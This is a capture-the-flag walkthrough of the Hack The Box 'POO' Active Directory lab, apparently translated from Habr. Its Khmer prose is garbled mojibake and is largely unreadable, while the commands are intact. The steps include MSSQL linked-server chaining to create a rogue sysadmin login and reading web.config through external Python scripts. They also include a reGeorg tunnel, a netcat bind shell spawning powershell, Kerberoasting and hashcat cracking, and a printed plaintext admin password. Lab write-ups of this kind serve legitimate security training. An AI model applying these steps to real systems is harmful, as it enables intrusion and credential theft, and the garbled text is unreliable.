αα
αααα»αα’αααααααα ααΎαααΉααα·ααΆαααΆαα’αα»ααααα·αααααΉααααααΆαααΈαααα»ααααααα ααα»ααααααΆαααααΈααα·αααααααααΆαααΌα
ααΆααααΌαααΈααα ααααα
ααΌα αααααΆααααααΆαααα αααα»αααΆααα·αααααΆ POO ααααΌαααΆααα ααΆα‘αΎαααΎααααΈααΆαααααααααΆααα αααααααααΆααααΆαααααΆαααΆααααα αΆααα αααα»αααα·ααΆααΆα Active Directory ααΌα αα½αα ααααα ααΊααΎααααΈαααααααααα½ααααΆαααΈααααααΆα αααααΎααα·αααα· α αΎαααΈαααα»ααααααααααα½ααααααΆααααΌααααααΆααααααΌααααα ααα½α 5 αα αααα»αααααΎαααΆαα
ααΆααααααΆαααα αααααΈααα·αααααααΊααΆαααα VPN α ααΆααααΌαααΆαααααΆααα·αα±ααααααΆααααΈαα»αααααΌαααααααααα»αααααΎααΆα α¬ααΈαααΆαααΈααααααΆααα·ααααααααααΆααααααααΆααα’ααα αα αααα’αααα αΌααα αααα»ααααααΆαα―αααααΆαα½αααα»ααααααααΉαα’αααΈαα»ααααα·ααΆαααααααΆα π
ααααααΆαα’αααααΆα
ααΌα
ααααβα’αααβα’αΆα
βαααααβαααβα’αααΈβα’αααααβααααΈ αααααα·ααΈ αα·αβααααααΆαβαααααβααα αααα»αβααΆαβαααααΎα
ααααααΆαααΆααα’ααααααΌαααΆααααααααΌααααααΆαααααααααα’ααααααααα»αααααα α’ααααα·ααααααα―αααΆααααααααααααΆαα·αααΆαααΆαααα½ααα»αααααΌαα
ααααααΆαααΌα
ααΆαααΆαα½ααααααααα‘αΎαα
ααααααααΆααααΆαααααααΆααααααααααΆαααααΎααααΆααα
ααααααΉα αα·ααα·ααΈααΆααααααααααα½αααΆαααΆααααααααααΆααα·ααααΆα―αααΆααααα
ααΆαααααΆα
α αααααααα αααααααΆααααΆαααΈαααΈα αα·αααΆααααα ααα½α 5 α
ααΆααα·αααααΆ αα·αα’αΆααααααΆααααααααΆαααΈααααααΆαααααΆααααααααΌαααΆααααααα±αααααααα
αααα
αΆααααααΎα!
αααααΆαα· Recon
αααΆαααΈααααααΆαα’αΆααααααΆα IP αα 10.13.38.11 ααααααα»ααααααααα
/etc/hosts α
10.13.38.11 poo.htb
ααα αΆαααααΌαααΊααααΌααααααα αααααΎαα αααααΆαααΆααααΌαααΆααααααΌαααΎααααΈαααααα αααααΆααα’αααααααααΎ nmap ααααΌααααα»αααΉαααααΎααΆααΆαα½α masscan α ααΎααααααα ααα TCP αα·α UDP ααΆααα’ααααΈα ααα»α αααααΆαα tun0 αα 500pps α
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
α₯α‘αΌαααα ααΎααααΈααα½αααΆαααααααΆααααα’α·αααααααα’αααΈααααΆαααααααααααΎαααΆααα
ααΎα
ααα ααΌαααααΎαααΆαααααααααααααΎαααααΎα -A α
nmap -A poo.htb -p80,1433
ααΌα
ααααααΎαααΆαααααΆαααα IIS αα·α MSSQL α αααα»αααααΈααα ααΎαααΉααααααααααααα DNS αα·αααααΆαααααα domain αα·ααα»αααααΌαααα αα
ααΎαααΆαααΈαααααα ααααα ααΎαααααΌαααΆαααααΆααααααααααααααΎα IIS α
α
αΌαααΎαααααΉαα‘αΎααα·ααα
ααΎααα αααα»αααααΎ gobuster αααααΆααααΆααααα αα
αααα»ααααΆαααΆααααααααΎααααααΆααα
ααα½αααααΆαααααΆα 128 (-t), URL (-u), αα
ααΆαα»αααα (-w) αα·αααααααααααααααα
αΆααα’αΆααααααααΎα (-x) α
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
ααΌα
αααα ααΎαααΆαααΆααααααααααΆαα HTTP αααααΆαααα /admin ααααΌα
ααΆα―αααΆααααα»αααααΆαααααα» .DS_Store αααααΆαα .DS_Store ααΊααΆα―αααΆαααααααααΆαα»αααΆααααααα’αααααααΎααααΆαααααααΆααααα―αααΆα ααΌα
ααΆαααααΈα―αααΆα ααΈααΆααααΌαααααΆα ααΌαααΆαααααααΆαααααααααααΆαααααΎαααΎαα α―αααΆαααααααα’αΆα
αααα
αααα
αααα»ααααααΆαααΈαααααα αααααααααα’αααα’αα·ααααααααα αααααα ααΌα
αααα ααΎαααα½αααΆαααααααΆαα’αααΈααααΉαααΆαααααα―αααΆαα αααααΆααααΆααααα’αααα’αΆα
ααααΎ
python3 dsstore_crawler.py -i http://poo.htb/
ααΎαααα½αααΆαααΆαα·ααΆααααα α’αααΈααααα½αα±ααα
αΆααα’αΆαααααααααα»ααα
ααΈαααααΊαα / dev αααααΎαα’αΆα
ααΎαααΎαααααααα·αα―αααΆα db ααΆααΈαααΆααΆα ααα»ααααααΎαα’αΆα
ααααΎ 6 αα½α’ααααααααΌααααααααα―αααΆα αα·ααα ααααα·αααΎααααΆααααααΆααααααααααα IIS ShortName α α’αααα’αΆα
αα·αα·αααααΎαααΆαααΆααααααααααααααααααΎ
α αΎαααΎαααααΎαα―αααΆαα’ααααααα½ααααα
αΆααααααΎαααα "poo_co" α αα·αααΉαααΆααααΌαααααΎα’αααΈαααααΆαααα αααα»αααααΆααααααααΎαααΎαααΈαα
ααΆαα»αααααααααααΈααΆαααααΆααα’αααααα
αΆααααααΎαααα "αα " α
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
α αΎαααααΎαααααααααΆαα½α wfuzz α
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
α αΎααααααααααΆαααααααΉαααααΌα! ααΎαααΎαα―αααΆαααα αααααΆαα»αααααααΆααααααΆαα (αα·αα·α
ααααααααααΆαααΆαααααα DBNAME αα½αααΆααααΈ MSSQL)α
ααΎαβααααααβαααααΆαα· α αΎαβααΎαβααΆαβαα
βαα»α α’α %α
αααααΆαα·
ααΎαααααΆαααα MSSQL αααα»αααααΎ DBeaver α
ααΎααα·αααΆαααααΎαα’αααΈααααα½αα±ααα
αΆααα’αΆαααααααα
αααα»αααΌαααααΆααα·ααααααααααα α
αΌαααΎααααααΎα SQL Editor α αΎααα·αα·αααααΎαααΆααΎα’αααααααΎααααΆααααΆα’αααΈα
SELECT name FROM master..syslogins;
ααΎαααΆαα’αααααααΎααααΆααααΈαααΆααα ααΌαβαα·αα·αααβααΎαβαα·αααα·βααααβααΎαα
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
ααΌα
ααααβααααΆαβαα·αααα·βα’αααΈβααα αααααΎααααΆαααΈααααααααΆαααααΆαααααα»αααΆααααααα’αααΈαα
αα
αααααααααααΆαααα’α·α
SELECT * FROM master..sysservers;
ααΌα
ααααααΎαααααΎα SQL Server ααααααααα α
αΌαααΎααα·αα·αααααΎαααΆαααααα·ααααα·ααααΆααααααααΆαα
ααΎαααΆαααΈαααααααααααααΎ openquery() α
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
α αΎαβααΎαβαααααΆααβα’αΆα
βαααααΎαβαααααΆαβαααα½αα
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
ααΆααα·αααΊααΆαα ααααααααΎαααααΎααΆαααααΎαα»ααα ααΆαααααΆαααΈααααααααΆαααααΆαα ααααΎααααΌαααΆαααααα·ααααα·αααα»αααα·ααααα’αααααααΎααααΆαααααααααα! αααααΎαααα·ααα’αααααααΎααααΆααααΆαααααΎααααα»αααααΎαααΆααα ααΎαααΆαααΈααααααααΆαααααΆααα
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
α αΎαα₯α‘αΌααααααΌαααΎααα
αααα»αααα·ααα’αααΈαααααααΎααΈαααΆαααΈααααααααΆαααααΆαααα
ααααααΎαααααΌαααΆαααααα·ααααα·!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
ααΌα
αααα ααΆααΊααΆααα·αα DBO αααααααΌαααααΆααα·αααα·ααΆααα’ααα ααΌααα·αα·αααααΎααα·αααα·αααα»αααααΈααΆαααααΎααΈαααΆαααΈααααααααΆαααααΆααα
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
ααΌα
αααα’αααα’αΆα
ααΎαααΎαααΆααα·αααα·ααΆααα’αα! ααααααααΎα admin ααααααΎαααααααα ααα»αααααα½ααααα·αα’αα»ααααΆαα±αααα½αααααααααΆαααααα½αααΎαα
αα αα α
αΌαααααΎααΆααΆαααα EXECUTE AT α
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
α αΎαα₯α‘αΌααααααΎαααααΆααααΆαα½αααααααΆααααααΆααααααα’αααααααΎααααΈ ααααααααΎαααΌαααααΆααα·αααααααααααααΈα
ααΎααααααααααααΆαα·ααα α αΎααααααα
αα»ααααα
αααααΆαα·ααΆαααααα
αααααααααααααααΎ MSSQL αααα»ααααα»αααααΎ mssqlclient ααΈαααα αα impacket α
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
ααΎαααααΌαααα½αααΆαααΆααααααααΆαα α αΎαααΏαααααΌααααααΎαααΆααα½ααα½α
α αΎαααΊααα αααααα ααΌα
αααα ααΎαβααααΌαβααΆαβααΆαβαααααβαα
ααΆααααααααβαααΆαααΈαβαααααΎβαααααΆα (ααΎαβαα·αβα’αΆα
βαααβαααβαααβααΆαβαααα½αβαααβαα ααΆαααααααβαααααΆααβααααΎαβαααα»αβααααΎαααΆα)α
ααα»ααααααΆαα
αΌαααααΎααααΌαααΆαααα·αααα αααααΈααΆααΎαα’αΆα
α’αΆαα―αααΆαααΈ MSSQL ααααα ααΎαααααΆααααααααΌαααΉαααΈα’αααΈαααααΆααΆααααααααααα·ααΈααααΌαααΆαααααααα
ααΆααααααααα α αΎααα
αααα»ααα MSSQL ααΎαααααΎαααΆααΆα Python α
αααααΆαααααα·αααΆααααα αΆαααα»αααΆαα’αΆαα―αααΆα web.config ααα
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
ααΆαα½αααΉααα·αα·ααααααΆαααααααΆαααααΎα ααΌαα
αΌααα
ααΆαα /admin α αΎααααααααΆαα·α
αααααΎα
ααΆααα·α ααΆαααΆααα’αΆαααα’α½ααααααααΈααΆαααααΎααααΆαααααααΆααααααΎα ααα»ααααααΎαααΆααααααΆαααααααααααΆα ααΎαααααααααΎαααΆ αα·ααΈααΆα IPv6 ααααααΌαααΆαααααΎααααΆααααααα!
ααααααα’αΆααααααΆαααααα
/etc/hosts.
dead:babe::1001 poo6.htb
αααααααααααΆαααΈαααααααα ααα»ααααααΎααααααΎα IPv6α
α αΎαααααΆαααα WinRM ααΆααα
ααΎ IPv6 α α
αΌαααααΆααααΆαα½ααα·αα·ααααααΆαααααααΆαααααΎαα
ααΆαααααα½ααα
ααΎαααααα» ααΌαααααααααΆα
αααααΆαα· P00ned
αααααΆααααΈααΆαααααααααΆαααααΎααα
αΆααααααααΆαα½α
setspn.exe -T intranet.poo -Q */*
α
αΌαααααα·ααααα·ααΆααααααααΆααΆαααα MSSQL α
αα
αααα»ααα·ααΈααα ααΎαααα½αααΆα SPN ααα’αααααααΎααααΆαα p00_hr αα·α p00_adm αααααΆααααααΆαα½αααααΆααααααααααΉαααΆαααΆααααα αΆαααΌα
ααΆ Kerberoasting ααΆααΎαα ααα»ααα ααΎαα’αΆα
ααα½αααΆαααααααααΆαααααααα½αααΆα
ααααΌαα’αααααααΌαααα½αααΆαααααααααΆααααααααΆααααα»αααΆαα’αααααααΎααααΆαα MSSQL α ααα»αααααααααΆαααΎαααΆαααααα·ααααα»αααΆαα
αΌαααααΎ ααΎαααΆαααΆααααααΆααααΆαα½ααααΆαααΈαααΆααααα
ααα 80 αα·α 1433 ααα»αααααα ααα»ααααβα’αΆα
βααααΎβα
ααΆα
αααβααααΌαβααΌαβαααααβααΈβααΆαβα
ααα α¨α ! αααααΆααααΏααααααΎαααααΎ
ααα»αααααα
ααααααααΎαααααΆααΆαα
αΌαααααΎααΆ ααΎαααα½αααΆαααα α»α 404 α αααααΆααααααΆα―αααΆα *.aspx αα·αααααΌαααΆαααααα·ααααα·ααα ααΎααααΈααααΎα±ααα―αααΆααααααΆααααααααααααααΆαααααααααΎαααΆα ααΌαααα‘αΎα ASP.NET 4.5 ααΌα
ααΆααααααα
dism /online /enable-feature /all /featurename:IIS-ASPNET45
α αΎαα₯α‘αΌαααα αα
αααα
αΌαααααΎ tunnel.aspx ααΎαααα½αααΆαα
ααααΎαααΆα’αααΈααα½α
ααΆααααΎααααΈααααΎαααΆαα αΎαα
αααα
αΆααααααΎααααααα’αα·αα·αααααααααα·ααΈ αααααΉααααααΌαα
ααΆα
αα ααΎαααΉααααααΌαα
ααΆα
αααααΆααα’ααααΈα
ααα 5432 αα
αααΆαααΈαααα
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
α αΎαααΎαααααΎ proxychains ααΎααααΈααααΎα
ααΆα
ααααααααα·ααΈααΆαα½αααΆααααααααΌααααΈααααααΎαα αααααααααααααΌααααΈααααα
α―αααΆαααααααα
ααΆαααααααα /etc/proxychains.conf α
α₯α‘αΌαβααΎαβαααα ααβαααααα·ααΈβαα
βαααΆαααΈαβαα
α₯α‘αΌαααα ααΆαααα MSSQL ααΎαααΎαααααΎαααΆααααααα·ααΈααααΆααα
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
α αΎαααΎαααααΆααααΆααααααααΌααααΈααααααΎαα
proxychains rlwrap nc poo.htb 4321
α αΎαβααΎαβααα½αβααΆαβαααααΆα
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
αααααΆαα α’αααααααΌαααααΎαααααααααΎαααααΆααΆαααααα αααααΆα Rockyou αα·αααΆααα
ααΆαα»αααααα·ααααααααΆααααααααΆαα αααα»αααΆαααααΎαα
ααΆαα»ααααααΆααααααααΆααααΆααα’αααααααΆααα
αααα»α Seclists α αααααΆααααΆαααααΆααΎαααααΎ hashcat α
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
α αΎαααΎαααααΎαααΆααααααααΆααααΆααααΈα ααΈαα½ααα αααα»ααα ααΆαα»αααα dutch_passwordlist.txt αα·αααΈααΈααα αααα»α Keyboard-Combinations.txtα
ααΌα
ααααα αΎα ααΎαααΆαα’αααααααΎααααΆααααΈααΆαα ααΎααα
domain controllerα α
αΌαβαααααβααβα’αΆααααααΆαβααααβααΆααβααΆβαα»αβαα·αα
ααα’ααΆαα ααΎαααΆααααα’αΆααααααΆα IP ααααα§ααααααααααΆαααα α
αΌαααΎαααααααααααΈα’αααααααΎααααΆααααΆααα’ααααααα ααααΌα
ααΆααΆααΎαα½ααααα½αααΆααΆα’ααααααααααααα ααΎααααΈααΆαααααααααΈαααΎααααΈααα½αααΆαααααααΆα PowerView.ps1 α αααααΆααααααΎαααΉαααααΆαααααααααΎ evil-winrm ααααααααΆααααααΆαα½αααααααΈααααα»ααααΆαααΆαααααα -s α α αΎααααααΆααααααααΆαααααααα»αααααααΈα PowerView α
α₯α‘αΌαααα ααΎαααΆααα·αααα·α
αΌαααααΎαα»αααΆαααΆααα’ααααααααΆα α’αααααααΎααααΆαα p00_adm ααΎααα
ααΌα
ααΆα’αααααααΎααααΆαααααααΆααα·αααα· ααΌα
ααααααΎαααΉαααααΎααΆααααα»αααα·ααααααααΆα ααααααααΎαααααα» PSCredential αααααΆααα’αααααααΎααααΆαααααα
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
α₯α‘αΌααααααΆααααααααΆ Powershell ααΆααα’αααααααΎααααααΆαα Creds ααΉαααααΌαααΆαααααα·ααααα·αααα»αααΆα p00_adm α α αΌααααα αΆααααααΈα’αααααααΎααααΆαα αα·ααα»ααααααα AdminCount α
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
ααΌα
ααααα αΎα α’αααααααΎααααΆααααααααΎααα·αααΆααΆααα·αααα·α α
αΆαααΎαααΆααΆααααΆαααα»αααΆαααα?
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
ααΈαααα»αααΎααααααΆααααΆα’αααααααΎααααΆααααΊααΆα’αααααααααααααααα ααΆαααααα±ααααΆααΌααα·αααα·αααα»αααΆαα
αΌααα
ααΆααα§ααααααααααΆαααααΈα
ααααΆαα αααααααΆααΆαα
αΌαααΆαα½α WinRM αααααααΎααααΌαααΌααααααααΈααααααΎαα αααα»αααΆαααΆααααααα
ααα‘ααααααα α»ααααα
ααααα reGeorg αα
αααααααΎ evil-winrm α
αααααΆααααααΎαααααΎαα½αααα ααΆααααα½αααΆαα
ααΎαααααΆααΆαααααΆαα α αΎαααΎααααα·ααα
αααα»αααααααααα
ααα»αααααα·αααΆααααααΆαα·ααα αααααΆααααααΎαα’αααααααΎααααΆαα α αΎααα·αα·αααααΎααααααα»α
αα
mr3ks ααΎαααααΎααααα αΎααααααΈααα·αααααααααΌαααΆααααα
αα 100% α
α’ααα αΎαα ααΆααα·αααααα’ ααΌααααααααα·ααΎααΆααΎα’αααααΆααααα’αααΈααααΈααΈα’αααααααα αα·αααΆααΎααΆααΆααααααααααααααΆααα’ααααααα¬ααα
α’αααα’αΆα
α
αΌααα½αααΆαα½ααα½αααΎααα
ααααα: www.habr.com